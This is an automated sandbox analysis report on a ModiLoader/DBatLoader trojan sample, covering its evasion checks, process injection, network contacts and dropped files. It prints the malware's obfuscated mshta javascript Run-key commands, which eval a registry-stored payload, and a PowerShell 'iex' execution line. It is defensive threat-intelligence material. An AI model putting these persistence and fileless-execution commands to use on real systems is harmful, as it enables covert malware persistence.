Malware Analysis Report

2024-08-06 14:28

Sample ID 240528-ss613sbc73
Target 7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118
SHA256 b484d4b1ac36fcbb4150ef16848d69841a2498dba4101fe1549d8e1de0a17261
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b484d4b1ac36fcbb4150ef16848d69841a2498dba4101fe1549d8e1de0a17261

Threat Level: Known bad

The file 7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

Looks for VirtualBox drivers on disk

ModiLoader Second Stage

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Checks computer location settings

Drops startup file

Adds Run key to start application

Maps connected drives based on registry

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
File and Directory Discovery
T1083
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-28 15:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 15:24

Reported

2024-05-28 15:26

Platform

win7-20240508-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:dKfJY9=\"rOv\";oF0=new%20ActiveXObject(\"WScript.Shell\");lk2al1EO=\"L4aM\";s3dgg=oF0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");X1Nvoc9a=\"T\";eval(s3dgg);KYutKG21=\"Db\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:au1pUF=\"544Ka\";T79P=new%20ActiveXObject(\"WScript.Shell\");AbnKC1n=\"168V8n9\";jlgo1=T79P.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");y6Z5vZ=\"UZR3nKj\";eval(jlgo1);AERA3A=\"yasFzJge\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2280 set thread context of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 set thread context of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:K4CL4Ti=\"A\";f3e1=new ActiveXObject(\"WScript.Shell\");k0P3SOmp=\"xhs\";iT0xA=f3e1.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");zflEw0g4N=\"tEW\";eval(iT0xA);nSwb6pF3=\"dTc5XVT\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 1616 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2280 wrote to memory of 1364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1364 wrote to memory of 2324 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:k6DCU="nXBpN5w";sb28=new%20ActiveXObject("WScript.Shell");wk4K2qT="fbQMI3jx";q5AFJ=sb28.RegRead("HKLM\\software\\Wow6432Node\\BBRZdKi\\qIaPDl");EY9cX1HE="eyC";eval(q5AFJ);Zw2Kom5W="o";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ramtbn

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 168.62.214.81:443 tcp
FR 164.81.131.210:80 tcp
US 208.157.135.32:80 tcp
US 104.8.53.10:80 tcp
AR 181.8.44.164:80 tcp
US 29.254.164.106:80 tcp
US 75.170.80.200:80 tcp
CN 112.235.146.236:80 tcp
NO 4.235.38.231:80 tcp
PK 39.44.84.67:8080 tcp
BD 114.130.18.40:80 tcp
BR 138.122.44.21:80 tcp
US 66.62.89.169:80 tcp
US 32.164.165.116:80 tcp
N/A 127.111.53.17:8080 tcp
CN 183.247.122.207:80 tcp
US 184.248.6.31:443 tcp
DE 185.244.61.206:80 tcp
US 204.196.38.28:80 tcp
TW 163.25.112.10:80 tcp
US 24.153.208.134:8080 tcp
CN 171.93.150.168:80 tcp
DE 51.121.135.167:80 tcp
SE 95.206.159.152:80 tcp
CN 118.72.76.79:80 tcp
AU 164.75.188.42:80 tcp
JP 117.108.174.193:8080 tcp
ES 147.84.48.23:80 tcp
ES 37.158.37.214:80 tcp
CO 186.103.95.179:80 tcp
KR 218.232.20.106:80 tcp
IE 54.75.48.247:80 tcp
JP 203.216.236.131:443 tcp
DE 5.5.104.9:8080 tcp
US 19.130.238.119:80 tcp
US 97.106.210.176:80 tcp
HK 18.167.122.61:80 tcp
US 173.214.96.145:443 tcp
US 214.129.12.194:80 tcp
JP 223.135.132.226:80 tcp
US 204.10.188.191:80 tcp
US 144.191.22.167:80 tcp
US 12.94.211.230:80 tcp
CA 199.215.43.139:80 tcp
HK 193.18.62.65:80 tcp
AU 211.27.77.15:80 tcp
US 11.75.1.193:8080 tcp
JP 126.127.174.100:443 tcp
US 15.141.242.213:80 tcp
US 155.101.50.184:80 tcp
US 208.4.109.134:80 tcp
CA 167.54.43.173:80 tcp
US 174.195.39.146:80 tcp
US 64.169.140.55:443 tcp
ID 36.69.98.117:80 tcp
VE 181.185.7.138:80 tcp
US 3.158.233.243:80 tcp
CN 119.142.166.122:80 tcp
AU 4.200.197.131:80 tcp
US 13.147.28.39:80 tcp
US 107.102.145.106:80 tcp
CN 49.114.56.16:80 tcp
CN 142.70.195.110:80 tcp
TW 219.80.138.88:80 tcp
JP 139.154.125.12:80 tcp
US 64.116.34.160:80 tcp
US 146.94.55.87:443 tcp
DE 53.115.41.229:80 tcp
US 170.46.244.200:80 tcp
NL 171.21.7.37:80 tcp
CN 49.221.57.135:80 tcp
US 140.58.54.37:80 tcp
US 141.230.188.118:80 tcp
IT 88.37.249.192:8080 tcp
JP 218.43.153.174:80 tcp
US 30.136.8.167:80 tcp
US 71.97.39.119:80 tcp
US 71.105.21.144:80 tcp
US 174.200.103.36:80 tcp
CN 120.67.188.9:80 tcp
US 13.154.193.182:80 tcp
US 172.63.119.21:80 tcp
MX 148.218.97.85:80 tcp
US 97.184.46.221:80 tcp
AU 131.172.130.91:8080 tcp
MY 202.56.84.147:80 tcp
US 205.47.230.170:443 tcp
UY 186.54.238.132:80 tcp
US 11.1.161.18:80 tcp
US 136.107.87.44:80 tcp
CN 118.145.229.62:80 tcp
VN 123.18.31.27:80 tcp
US 73.82.21.100:8080 tcp
US 33.79.110.201:443 tcp
US 68.252.145.93:80 tcp
DE 109.192.149.169:80 tcp
US 159.102.15.114:443 tcp
US 154.30.116.215:80 tcp
US 35.211.128.85:80 tcp
CN 112.58.163.11:80 tcp
TR 94.103.43.58:80 tcp
BR 187.112.19.65:80 tcp
US 9.246.194.60:8080 tcp
US 140.46.173.24:80 tcp
IT 51.119.126.25:443 tcp
US 147.255.27.136:80 tcp
RU 92.37.183.69:80 tcp
JP 133.158.39.29:80 tcp
JP 106.131.30.85:80 tcp
HK 223.130.36.28:80 tcp
JP 122.218.197.158:80 tcp
US 162.72.120.132:80 tcp
US 24.237.90.17:80 tcp
BR 191.186.246.233:80 tcp
MX 189.131.96.61:80 tcp
US 147.55.207.231:80 tcp
GB 147.114.174.191:80 tcp
CA 138.11.70.171:80 tcp
US 38.189.34.123:80 tcp
TW 218.32.254.28:8080 tcp
CN 175.168.207.93:443 tcp
NL 86.90.115.34:80 tcp
US 52.171.207.183:80 tcp
DE 46.114.233.137:80 tcp
CN 42.171.138.119:80 tcp
CN 218.4.177.110:80 tcp
NL 82.169.109.4:80 tcp
BR 179.138.183.37:80 tcp
US 30.73.194.177:80 tcp
AU 163.216.242.241:80 tcp
US 172.178.124.82:80 tcp
US 24.59.69.46:80 tcp
KR 60.196.191.82:80 tcp
US 12.88.80.242:80 tcp
BR 191.40.128.75:80 tcp
EG 102.62.77.170:80 tcp
US 215.108.75.135:80 tcp
PL 85.222.8.37:80 tcp
US 152.6.241.115:80 tcp
US 66.10.250.121:80 tcp
RS 5.22.165.144:80 tcp
N/A 127.29.168.27:80 tcp
CN 101.195.27.113:80 tcp
US 140.187.84.25:80 tcp
US 204.34.21.104:443 tcp
US 108.58.24.40:80 tcp
JP 202.226.72.37:80 tcp
N/A 149.170.33.159:80 tcp
N/A 4.145.222.146:80 tcp
N/A 198.142.101.218:443 tcp

Files

memory/1616-0-0x00000000002C0000-0x00000000002C4000-memory.dmp

memory/1952-1-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1616-3-0x0000000000400000-0x0000000000453000-memory.dmp

memory/1952-6-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1952-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1616-4-0x00000000002C0000-0x00000000002C4000-memory.dmp

memory/1952-7-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1952-8-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-9-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-10-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-11-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-12-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-13-0x0000000000440000-0x0000000000516000-memory.dmp

memory/1952-14-0x0000000000440000-0x0000000000516000-memory.dmp

memory/2280-23-0x0000000006160000-0x0000000006236000-memory.dmp

memory/1364-25-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-27-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/2280-28-0x0000000006160000-0x0000000006236000-memory.dmp

memory/1364-29-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-35-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-38-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-43-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-33-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-34-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-32-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-31-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-30-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-37-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-51-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-58-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-61-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-50-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-49-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-67-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-68-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-48-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-47-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-46-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-45-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-44-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-42-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-41-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-40-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-39-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-60-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-57-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-56-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/1364-36-0x00000000001F0000-0x0000000000331000-memory.dmp

memory/2324-87-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-86-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-85-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-84-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-83-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-82-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-81-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-80-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-79-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-78-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-77-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-76-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-75-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2324-74-0x0000000000210000-0x0000000000351000-memory.dmp

C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat

MD5 14adc766d85da95cd0990ed6bcc1524d
SHA1 e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA256 0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512 b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

